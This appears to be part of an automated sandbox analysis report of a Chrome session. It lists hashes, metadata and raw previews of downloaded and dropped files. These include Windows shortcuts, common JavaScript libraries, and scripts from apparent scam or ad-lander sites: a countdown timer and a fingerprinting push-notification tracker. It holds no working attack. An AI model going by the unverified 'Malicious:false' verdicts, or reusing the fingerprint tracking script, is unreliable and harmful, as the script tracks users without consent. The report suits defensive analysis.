                                                                                        Entropy (8bit):4.012764188913217
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:ADC89F1730632CFCCB2DE952FF43991E
                                                                                        SHA1:A6A06DC179BCCEB98E4E810FA67A7D2242602D07
                                                                                        SHA-256:6114BCDAB4AB823709563266873222C3F31890B2984341835804E0A90C3500B9
                                                                                        SHA-512:53D4FA0275F671526B2AC0D916C7330461F414CF49096D0889A19E30EDB36513127220CBAB681B5FEB5EDFFC366223DDEAD79A0E54FAFF69CBFB6A0CC691ACDB
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X .....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X).....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X).....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X)............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............?......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue May 7 17:41:19 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                        Category:dropped
                                                                                        Size (bytes):2677
                                                                                        Entropy (8bit):4.003240605889822
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:43EB4D56A97DEA745A100F6A0A3362DE
                                                                                        SHA1:20639BB966FA366F146C68116E1A649E44E129D9
                                                                                        SHA-256:A2B46302256074AE36DCE288B25A2C16D6FC2699122222217956FAB55446ADA7
                                                                                        SHA-512:9AB189EF277AF93FD719F2139D2BC60195B9A7ECCAA505B4A848CEA0D4C71F3CF7E0BB7C31CAE2EA430DDB6765131378473E21B117ACA0FEFB5FC2DD3E2F556C
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:L..................F.@.. ...$+.,....g.y&....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X .....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X).....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X).....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X)............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X*............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............?......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue May 7 17:41:19 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                        Category:dropped
                                                                                        Size (bytes):2677
                                                                                        Entropy (8bit):3.989960971601413
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:30D319A260FA10A66FC795940D6BA933
                                                                                        SHA1:D184135EA6D5BBC7218A1A1A49476A214B813386
                                                                                        SHA-256:C4FDA9D8B318564DD043DC4FB313758CB6C6B49899014F6530D3EF3462463D8C
                                                                                        SHA-512:AB1A19CAF45AC0D8946BAD8CA7C1B0D18D5D5FDD316859234150A05A21E319A426E5B3AFDA6B36399C170A8CE8E9197C24E4C546EAD8387461F1AE8E366779C5
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:L..................F.@.. ...$+.,....Po.&....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X .....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X).....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X).....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X)............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X*............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............?......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue May 7 17:41:19 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                        Category:dropped
                                                                                        Size (bytes):2679
                                                                                        Entropy (8bit):4.002632781234745
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:3B29C1D00F05282B3DFB32BE6F40F552
                                                                                        SHA1:CC735220C2FF27A129A1819EE9745F3C0D39896C
                                                                                        SHA-256:21EE2A3DE3439283BD7AFF5D81148920AC34F83A9FB3BC394160892453E34ACB
                                                                                        SHA-512:A0BD0AB051282DB0E624AD87E255C607BBB2C7BAFBF8E314AA7C929B7FE5A4747AF2891E9C8D1B8B99D6C79804D35582063C36A3FD0F2AE7DF316D683F97E269
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:L..................F.@.. ...$+.,.....Kq&....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X .....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X).....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X).....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X)............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X*............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............?......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                        Category:dropped
                                                                                        Size (bytes):6851
                                                                                        Entropy (8bit):4.540748445992791
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:385C49D2CC66066B5B31DF07C9CE5E21
                                                                                        SHA1:2502DDCCCCAA9C94A88961F162B4D1D7BA147C40
                                                                                        SHA-256:045FAC92F0590FB2BF5C19B6723E90A9FBB11231AA0A84C9D32AF162A3A8B8CB
                                                                                        SHA-512:153CD0ED7568E1EE51185B132D8CFCFBAF00C07427496EFAB13A93F4F683BC8CFD25B7947EF892C813F5814CB5D095970A4BD16001BBA714DF5FD7752383E2B9
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:<svg width="17" height="17" viewBox="0 0 17 17" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0_1356_15526)">..<path d="M1.08105 13.9879H16.5293C16.6816 13.9879 16.8052 13.8644 16.8052 13.712V3.781C16.8052 3.62866 16.6816 3.50513 16.5293 3.50513H1.08105C0.928707 3.50516 0.805176 3.62866 0.805176 3.781V13.712C0.805176 13.8644 0.928707 13.9879 1.08105 13.9879Z" fill="#C8414B"/>..<path d="M16.8051 5.71216H0.805176V11.7812H16.8051V5.71216Z" fill="#FFD250"/>..<path d="M7.56382 8.74653L7.79773 7.694C7.81929 7.59706 7.74551 7.50513 7.6462 7.50513H7.48145C7.38217 7.50513 7.30842 7.59706 7.32992 7.694L7.56382 8.74653Z" fill="#C8414B"/>..<path d="M7.8398 8.19482H7.28809V10.5395H7.8398V8.19482Z" fill="#F5F5F5"/>..<path d="M7.97749 7.91919H7.1499V8.19507H7.97749V7.91919Z" fill="#FAB446"/>..<path d="M7.97849 8.74658H6.59912V9.02246H7.97849V8.74658Z" fill="#C8414B"/>..<path d="M7.97847 9.85006L7.15088 9.57421V9.29834L7.97847 9.57421V9.85006Z" fill="#C8414B"/>..<path d="M3.4
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (65412)
                                                                                        Category:downloaded
                                                                                        Size (bytes):441506
                                                                                        Entropy (8bit):5.239960252735811
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:F65A23A64D0C9B0B593D80F56682A413
                                                                                        SHA1:864E720B6E39834002CFF78821D233CC7B891F1D
                                                                                        SHA-256:978EE1A0C4CDE9A8A517FB64340EA725F175787ECB907ACCE508E772B0270024
                                                                                        SHA-512:7EC689D127415629CA3A9AB6BB6A3590C29EC430469047A99BEE11992116E04DA42B190CC3EDD516958E22115A5F0C5BFB1F472769CBA4A1466A38EEE5EB0AD7
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://cdn.jsdelivr.net/npm/instantsearch.js@2/dist/instantsearch.min.js
                                                                                        Preview:/*! instantsearch.js 2.10.5 | . Algolia Inc. and other contributors; Licensed MIT | github.com/algolia/instantsearch.js */.!function(e,t){"object"===typeof exports&&"object"===typeof module?module.exports=t():"function"===typeof define&&define.amd?define([],t):"object"===typeof exports?exports.instantsearch=t():e.instantsearch=t()}("undefined"!==typeof self?self:this,function(){return function(e){function t(r){if(n[r])return n[r].exports;var a=n[r]={i:r,l:!1,exports:{}};return e[r].call(a.exports,a,a.exports,t),a.l=!0,a.exports}var n={};return t.m=e,t.c=n,t.d=function(e,n,r){t.o(e,n)||Object.defineProperty(e,n,{configurable:!1,enumerable:!0,get:r})},t.n=function(e){var n=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(n,"a",n),n},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="",t(t.s=214)}([function(e,t,n){"use strict";function r(e){return e&&e.__esModule?e:{default:e}}function a(e){if(Array.isArray(e)){for(var t=0,n=Array(e.lengt
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (2186)
                                                                                        Category:downloaded
                                                                                        Size (bytes):62428
                                                                                        Entropy (8bit):5.434909466624309
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:32BC41D964FAA1B95D9C61FC443DF579
                                                                                        SHA1:02D3F83DAC14FE996BABBFE332779ED182D39D1C
                                                                                        SHA-256:369AE154EAB37B7ADA7776B934833183BB053EBD1D0255F70EF8944F65CABB0C
                                                                                        SHA-512:45539D5A40BF03B25C6F4328C0D10BF62A1012FF9BE634877D62EC8A7FF35B25DD6CDC0FDFD5FCAE2E3D980B6E4BA653B259C099935D52A20E8B6581CCE521D5
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.gstatic.com/charts/loader.js
                                                                                        Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.'use strict';function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ca(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var l=ca(this);function p(a,b){if(b)a:{var c=l;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&ba(c,a,{configurable:!0,writable:!0,value:b})}}.p("Symbol",function(a){function b(h){if(this instanceof b)throw new TypeError("Symbol is not a constructor");return new c(d+(h||"")+"_"+e++,h)}funct
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                        Category:downloaded
                                                                                        Size (bytes):447
                                                                                        Entropy (8bit):4.780373151066974
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:366EC0E99925B40E1E45D70DC75C95A0
                                                                                        SHA1:252E050AB64B6ECD0E8D9912F089DFA69D5BB194
                                                                                        SHA-256:7F5294F387AFC167E9012599B73ADA83B6093DDB37E94FC77B7EF42ABF4D155A
                                                                                        SHA-512:F4652CE49E011800C8D66D9F1B654B268955E2EADE59C54CB1E8BDD6EF1531CC4F825F3B3B004EE7639EC4A85C9705C1ED36DA56C5E628FE7B501F1B3C238991
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.ibisworld.com/resources/img/icn-maginifier.svg
                                                                                        Preview:<svg width="20" height="20" viewBox="0 0 20 20" fill="none" xmlns="http://www.w3.org/2000/svg">..<path d="M19.0004 19.0007L15.5005 15.5007M18.0004 9.50073C18.0004 14.1952 14.1948 18.0007 9.50043 18.0007C4.80601 18.0007 1.00043 14.1952 1.00043 9.50073C1.00043 4.80631 4.80601 1.00073 9.50043 1.00073C14.1948 1.00073 18.0004 4.80631 18.0004 9.50073Z" stroke="#999999" stroke-width="1.66667" stroke-linecap="round" stroke-linejoin="round"/>..</svg>..
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (65299)
                                                                                        Category:downloaded
                                                                                        Size (bytes):80927
                                                                                        Entropy (8bit):5.179669759700838
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:21F815FF6D1883C4E81D821D38FF4070
                                                                                        SHA1:386EA8BD17F21149C4E3A2303665FE6398E4E7D0
                                                                                        SHA-256:F67B782EC5A62C8FCEDB89535BCF48CC02AE06A119E3B97FE2B875FAD1FF358F
                                                                                        SHA-512:90115F497B93299700055A2E4581A7528DF928A6B5141AD88301B83C0C7B6761DEAE89279B471AD859B64E8B1DAEB237E7A1031CC5B7F374B7212AF029C54F53
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.electronixmaster.com/a/dewalt-tool-set/v1/app/desktop/js/bootstrap.bundle.min.js
                                                                                        Preview:/*!. * Bootstrap v4.5.2 (https://getbootstrap.com/). * Copyright 2011-2020 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery")):"function"==typeof define&&define.amd?define(["exports","jquery"],e):e((t="undefined"!=typeof globalThis?globalThis:t||self).bootstrap={},t.jQuery)}(this,(function(t,e){"use strict";function n(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function i(t,e,i){return e&&n(t.prototype,e),i&&n(t,i),t}function o(){return(o=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&Object.prototype.hasOwnProperty.call(e,"default")
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 74256, version 329.-17761
                                                                                        Category:downloaded
                                                                                        Size (bytes):74256
                                                                                        Entropy (8bit):7.996875020662388
                                                                                        Encrypted:true
                                                                                        SSDEEP:
                                                                                        MD5:418DAD87601F9C8ABD0E5798C0DC1FEB
                                                                                        SHA1:A6B003EF506E92D05CDE73ADF67487D7FD7EC6DF
                                                                                        SHA-256:F18C486A80175CF02FEE0E05C2B4ACD86C04CDBAECEC61C1EF91F920509B5EFE
                                                                                        SHA-512:99B9741F2A1C1D50E011C934C2445B07D9460F320EE60132B87D6594E9D91DBF3436849AE4745E29C58AD77846DA5AC3F3C5BEED8389CF8A8177C1E47F1AA8F6
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://use.fontawesome.com/releases/v5.8.1/webfonts/fa-solid-900.woff2
                                                                                        Preview:wOF2......"........H..!..I......................?FFTM....`........D..;.6.$..,..0.. ..%..m[&A....._...Ve....-:.....'..m.j...x..zm.....oJ.2....$...Q[....n.Q.../.:..To&.a..C....f.|1;#...1..(i!k....../4...Zk......z...`0B)..t&2"2".!"....W..LF..FD&...>l6e.^P.o...O.P............e..*...~.\.y...".$xrK;..........$6.i..f.+.$*Q.JT.....=.!.@}Y+nu5O.9.o<.szI...Tl.:G..x$...>M.K/O6...Typuw....4.q\0.F.i...n.4.>.....>.n......16.V/...{..K...{=w....09@.....11....h...z..Ye6.o.Up...+.[E3.....E.b~...y....a.*...Q.]|Y...g..0...Mh...lhK.K...N.....W...Fk..,81...Z..<.q&.j3..-A.....9$B...w)...A`.....Ad.....m......Vj.l.=.....d...z....{).V..;.%`})9...B`.N.O.O..W9....3....N.9.oB.t,...1....i./J...x...,..i.T.U...w..9.f5..l.....F..X.JL.n.....I.}Y...1.h............I..0.....X.p..'...yE.R...:..K..v...r..).h.x"s.f.......@.X..p.z.9.{....Z...Cly.3...ese..b"..A.....>.}K..!.r...@.P.......x...?..{.=..4..1i...h.lk."......d.{i..I ..?.3.4{6rI.[.ZX.R.`....+..(..r.....!.^.x.>../.K.*]..j...@`.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text
                                                                                        Category:downloaded
                                                                                        Size (bytes):1836
                                                                                        Entropy (8bit):4.943416711762064
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:902FFAF82918FE85CD11E44A6F153F9E
                                                                                        SHA1:05E19338A1E4795106E8C2188EEC970BA2A72ECB
                                                                                        SHA-256:F6A4ABFC08F9D1C5A888415F75AAD862E519A2283D43E2677F0090ED475870CD
                                                                                        SHA-512:1797ECB1712201027FA88B9B02F16F1460F659A05B4CE32708E36A24A9454679E336719A46DBB40F822EFA0543A0F419519B6A5D47EA06B9725AA772BFE2547A
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://qwartiqpin.online/assets/js/functions.js?v=fb00c92e59fc03510f7e6c64e8419364
                                                                                        Preview:function datehax() {. var mydate = new Date(). mydate.setDate(mydate.getDate());. var year = mydate.getYear(). if (year < 1000). year += 1900. var day = mydate.getDay(). var month = mydate.getMonth(). var daym = mydate.getDate(). if (daym < 10). daym = "0" + daym. var dayarray = new Array("Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"). var montharray = new Array("January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December"). return "" + montharray[month] + " " + daym + ", " + year + "";..}..function startTimer(duration) {. var timer = duration, minutes, seconds;. setInterval(function() {. minutes = parseInt(timer / 60, 10);. seconds = parseInt(timer % 60, 10);.. minutes = minutes < 10 ? "" + minutes : minutes;. seconds = seconds < 10 ? "0" + seconds : seconds;. if(typeof($('#time')) != "undefined"){. $('#time').html(minutes + ":" + seconds);. }. if (
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text
                                                                                        Category:downloaded
                                                                                        Size (bytes):1622
                                                                                        Entropy (8bit):4.798133134876905
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:FED66FB89ACBA82DD74138EBD750C23B
                                                                                        SHA1:1266EAE7ABAFB19A2714D9FB00D05CC263ADD748
                                                                                        SHA-256:72B629CD526729BD25E6091B21E3E3ED6E16E17FB549A700F029F0C5693B0F4F
                                                                                        SHA-512:CE481698DA730D19035486BCB5C3A2C59E36ABC554F07F9ABC272FFA53376AF75BABA0F3DF54C8D46AC8AE4C596D6CEC20B716BD75E68C9368010F7E98A0C1D8
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://qwartiqpin.online/inc/msg.v3.js?663a75d85e43f
                                                                                        Preview:function pushCount(pshparams,pshpub,pshfingerprint){....var xhr = new XMLHttpRequest();..xhr.open('POST', '');..xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');..xhr.onload = function() {...if (xhr.status === 200) {....var res = JSON.parse(xhr.responseText);....if (res.data === true) {.....console.log('push fired');....}else{.....console.log('params not found');....}...}..};..var pshparams = pshparams;..var pshpub = pshpub;..var data = '_type=ajax&_action=master-pushCount&s1=' + pshparams + '&s2=' + pshpub + '&fp=' + pshfingerprint;..xhr.send(data);.}....var MYCALL = MYCALL || (function(){. var pshparams = {}; // private. return {. init : function(Args) {. . //console.log(Args[2]);. pshparams = Args[0];. pshpub = Args[1];. pshdomain = Args[2];. pshfingerprint = Args[3];. // some other initialising. },. send : function() {. var script = document.createElement("scrip
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):160
                                                                                        Entropy (8bit):5.148930603814337
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:387A6E4636842F8C63E8923723D1713C
                                                                                        SHA1:029147B0D5A7EB7E2FE38958013F6A38BC00E3CF
                                                                                        SHA-256:4ECC5BEA6E679A2DE96D6EAD0300475CB26F7E3F126B7BC64BEA19D9CC3E0B76
                                                                                        SHA-512:BBC811DCA1C6C7E57C070B9F8F889ABBFA5A39CAF5B2A98CCC83FE71FB09A1D2BC5D4C73174008DFA3540D7066D9348CAC377640F079CBF408F2465A7FD0DF63
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISSAkr4W_qm2WwoxIFDWtomm4SBQ1Pnif4EgUNg6hbPRIFDRIP_GoSBQ2maZZCEgUNUzvtnBIFDV3ehywSBQ2xbWyWEgUN6-AakA==?alt=proto
                                                                                        Preview:CnUKCw1raJpuGgQIAxgBCgsNT54n+BoECAUYAQoLDYOoWz0aBAgJGAEKCw0SD/xqGgQIDRgBCgsNpmmWQhoECB4YAQoLDVM77ZwaBAghGAEKCw1d3ocsGgQIJBgBCgsNsW1slhoECCIYAQoLDevgGpAaBAgjGAE=
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (65451)
                                                                                        Category:downloaded
                                                                                        Size (bytes):88144
                                                                                        Entropy (8bit):5.290986223370378
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:F832E36068AB203A3F89B1795480D0D7
                                                                                        SHA1:2115753CA5FB7032AEC498DB7BB5DCA624DBE6BE
                                                                                        SHA-256:4C24DFD28784AD2BEFB3DAFAAC6BF1ED4E7CD58CCE713D9A0B228D426E812BAF
                                                                                        SHA-512:B9DBC08C984AE3C7FD44822EC2E9A22CB8CF7DA55FA3975DBBDC3F18FD7E7A7793E8D93604826574E3DD6A4F982D7AF4F96C1AF5E10D847B8394A34A82C398BA
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://qwartiqpin.online/assets/vendors/jquery-3.4.1.min.js
                                                                                        Preview:/*! jQuery v3.4.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],E=C.document,r=Object.getPrototypeOf,s=t.slice,g=t.concat,u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[o.call(e)]||"object":typeof e}var
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 140 x 60, 8-bit colormap, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):3071
                                                                                        Entropy (8bit):7.910382086539217
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:20069ED254CF488EB8223E05DF810414
                                                                                        SHA1:CD649F043E43B6986E63CB3BB6658FF33D91BF64
                                                                                        SHA-256:3AF054219051FA2D21116B671CE04B82989FD0155E6148466851E081F3E55BA1
                                                                                        SHA-512:185BC43754185CF123D5EC297CED49CA713CCA7794358661B6B3322E47D334A382E12C6C43438F1484A749A9FF1662027A769DDCF7E24AE522E7FE6605823A56
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.electronixmaster.com/a/dewalt-tool-set/v1/app/desktop/images/secure1.png
                                                                                        Preview:.PNG........IHDR.......<.......y....PLTE................./-0.. &#'...cadCAD..........,/B@C0.1RPS...zy{zxznln...............dbeFFIC@CRQSQORigi~|~rps..............-+...._]_xwy............'%(<9=C@CXVYKIL+(,qoq...................647ZXZ.......+/859.................._]_...pnp........FDG...GEG...425&#'...>;?...*(+.........<9=IFI_]_.~.......xvx>;>........[Y\*'+......LJMpoq...................647.......................6.....9..:..;..=..:.....0..=..8# $m..........................B.........v..................*............m{uvx..9...................u.opr.Yl.Zj..9..'.."...........Df..B..1................m..cz.C_.I]..'..%q.!......................YqYZ\.2Y.&K;;>..;.&6.......v..[wefh.Fa..=.........NPR.6N.9HE.wV...wtRNS....;....X..S.........UCB6......pcN1)....*$ ........~o7......<........{{qne[L,(.........~r^SQK....d.....w...?.......IDATh..gW.`..o)m.....(S@....{...I..H.d."....'..{....IU........\.{..w%..6l.a....t.7n...=..G/..oJ...q...X4..1'.4..4#==.1;.(k.z.s.1
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:JSON data
                                                                                        Category:downloaded
                                                                                        Size (bytes):83
                                                                                        Entropy (8bit):4.571849637096948
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:3DA995349724A8F8842CED656859B819
                                                                                        SHA1:AECB0E31E8EC55CF574D086456AE6282E4C5B167
                                                                                        SHA-256:FD5617077B7F77A93E8342087376AFB18E71D00ED907C9F117151B55ACED39F1
                                                                                        SHA-512:ADE70883F7B23C76631CE863F514064925F4EC2D8A75E6A04C8882C6839837185F0F9F7E006D91F804DDBA7B58909AEC24FD7A6EEE753E27F8286E121F2DE0E4
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://api.taboola.com/2.0/json/smpush-general/user.sync?app.type=web&app.apikey=dd83e155339c3c4626a1a3e8465b50db3024b412
                                                                                        Preview:{"user":{"id":"3a49b9e2-4266-443c-8db5-24c2ef1f43ec-tuctd33fb7f","isNewUser":true}}
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                        Category:dropped
                                                                                        Size (bytes):3704
